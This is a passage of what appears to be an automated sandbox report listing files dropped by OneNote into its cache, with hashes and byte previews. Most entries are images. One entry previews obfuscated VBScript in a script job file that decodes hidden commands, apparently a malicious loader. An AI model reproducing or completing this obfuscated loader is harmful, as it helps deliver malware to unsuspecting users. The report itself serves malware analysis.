                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:HTML document, ASCII text, with very long lines (744), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):63088
                                                                                                  Entropy (8bit):5.191423193815745
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6hKs7p4MAPEQbhh/8avllsFEaN3K19Z5zkzCIi5:6L7p4MafVLYEaN3K19ZWzCn5
                                                                                                  MD5:45282862AEB428FFB5D4986704A8F4D5
                                                                                                  SHA1:FA2B0A82F3CA6BC7C00704556C9494B303613972
                                                                                                  SHA-256:AF0C7D355BB6A495D038FD05217209054107D31AA6199C491B74AE3D24B11C7E
                                                                                                  SHA-512:DB6457AF502F45665CE4CC6573C5746607D8FFC661F0DCB224BECEED93886F6C6194561CACC0EFA543F0B2F62DB976742F42C6C8102C5B11B65329757110B1DB
                                                                                                  Malicious:false
                                                                                                  Preview:<job id="clockwork">..<script language="VBScript">..talkedy = talkedy + ("\ocw11934\ocw11628\ocw11016\ocw10098\ocw11322\ocw11934\ocw11220\ocw11832\ocw6222\ocw4998\ocw1326")..downstairsy = "downstairsy"..wittyy = wittyy + ("bjszvm\ocwfalsefreshybarbarouslyydistrustedyfreshy")..aptenty = "aptenty"..unfortunatebuty = mid(wittyy,7,4)..'partingypartingy..solelyy = Split(talkedy,unfortunatebuty,-1,0)..barbeledy = "barbeledy"..for volutpaty = 1 to Ubound(solelyy)...consultedy = consultedy & chr(Clng(solelyy(volutpaty)) / 102)..Next..'barbeledybarbeledy..talkedy = talkedy + ("\ocw11730\ocw10302\ocw11832\ocw3264\ocw10404\ocw11730\ocw11322\ocw9996\ocw10812\ocw10302\ocw10098\ocw11832\ocw6222\ocw10098\ocw11628\ocw10302\ocw9894\ocw11832\ocw10302\ocw11322\ocw9996\ocw10812\ocw10302\ocw10098\ocw11832\ocw4080\ocw3468\ocw11730\ocw10098\ocw11628\ocw10710\ocw11424\ocw11832\ocw10710\ocw11220\ocw10506\ocw4692\ocw10404\ocw10710\ocw11016\ocw10302\ocw11730\ocw12342\ocw11730\ocw11832\ocw10302\ocw11118\ocw11322\

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):49224
                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                  Malicious:false
                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):567
                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000059.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40884
                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005B.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24268
                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005D.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39010
                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005F.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59707
                                                                                                  Entropy (8bit):7.858445368171059
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                  MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                  SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                  SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                  SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005H.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):27862
                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006M.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22203
                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                  Malicious:false
